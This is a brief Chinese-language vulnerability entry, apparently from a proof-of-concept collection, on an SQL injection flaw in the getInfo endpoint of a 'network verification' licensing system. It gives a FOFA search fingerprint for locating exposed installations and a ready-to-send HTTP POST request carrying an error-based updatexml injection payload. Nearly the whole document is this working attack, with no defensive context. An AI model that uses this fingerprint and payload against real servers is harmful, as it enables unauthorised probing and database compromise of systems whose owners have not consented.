网络验证系统getInfo参数存在SQL注入漏洞
fofa
body="zhuya/js/base.js"
poc
POST /index.php/api/Software/getInfo HTTP/1.1
Host:
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
data=123456&id=1 and updatexml(1,concat(0x7e,md5(123),0x7e),1)
闽公网安备35020302035932号